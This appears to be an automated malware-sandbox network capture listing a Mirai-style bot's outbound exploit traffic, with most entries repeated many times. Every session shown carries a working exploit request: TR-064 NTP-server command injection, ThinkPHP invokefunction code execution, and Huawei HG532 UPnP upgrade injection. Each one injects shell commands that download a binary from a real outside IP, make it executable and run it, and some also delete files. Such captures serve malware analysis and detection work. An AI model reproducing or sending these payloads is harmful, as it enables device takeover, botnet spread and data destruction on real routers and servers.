                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          120192.168.2.135885878.196.170.647547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.869972944 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          121192.168.2.1355198112.16.92.18880
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.474723101 CET340OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1
                                          Connection: keep-alive
                                          Accept-Encoding: gzip, deflate
                                          Accept: /
                                          User-Agent: Tsunami/2.0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          122192.168.2.1356654157.225.245.17937215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.475080013 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          123192.168.2.1350174157.65.6.18437215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.476624012 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          124192.168.2.1353440157.22.152.8837215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.477526903 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          125192.168.2.1333446157.75.113.18937215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.478293896 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          126192.168.2.1351212157.188.223.6937215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.502408981 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          127192.168.2.1348056157.49.41.11737215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.503355026 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          128192.168.2.1336864157.229.239.14537215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.534306049 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          129192.168.2.1351232157.42.126.11537215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.535362959 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          130192.168.2.1342626189.205.54.1957547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.790465117 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          131192.168.2.1348400160.156.163.1957547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.792454958 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          132192.168.2.13379129.12.58.2027547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.792462111 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          133192.168.2.1335470101.81.175.907547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.794388056 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
